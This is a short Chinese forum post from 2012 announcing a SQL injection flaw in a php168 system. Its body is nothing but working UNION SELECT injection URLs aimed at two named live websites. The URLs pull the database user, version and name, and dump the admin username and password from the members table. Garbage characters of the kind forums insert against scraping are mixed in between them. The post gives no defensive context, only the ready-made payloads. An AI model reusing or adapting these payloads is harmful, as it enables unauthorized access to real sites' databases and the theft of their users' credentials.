找回密码
 立即注册
查看: 3255|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--) k3 A' C% J8 a9 U. o, g
                                                         
, }5 w0 P8 d' t  a- |1 v                                       * G7 p+ G. f7 h
+ Z% s# M9 l* k0 o1 {
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
, b! _5 T% |! d7 X                                                     * W( y* o0 e( _1 P1 A
                                                                   . i& _: V9 v/ J; ?0 E' \% m7 g' R5 B
                                                        ' o# x  \3 t2 D0 \" i! V
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
4 {- z; |* d% B
: R" \: O& z. Y6 Q: W' R0 M6 |8 `$ V/ a: C$ B/ }
0 E# b" R5 S6 t' X' N
                                                            
- I8 f) O% Q: o4 A9 ^
& J, S( R6 }( N7 W4 m  hhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
+ O% ]+ R/ h. b# X% A' r7 Y3 s, i- j7 @) Z. S, n" v$ \0 `- G

4 W. c9 U3 U( Y5 x% E% ?6 z# Y) F: f/ u1 A) n
                                                                    
" O8 h' G5 B1 A& e: Y) r

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表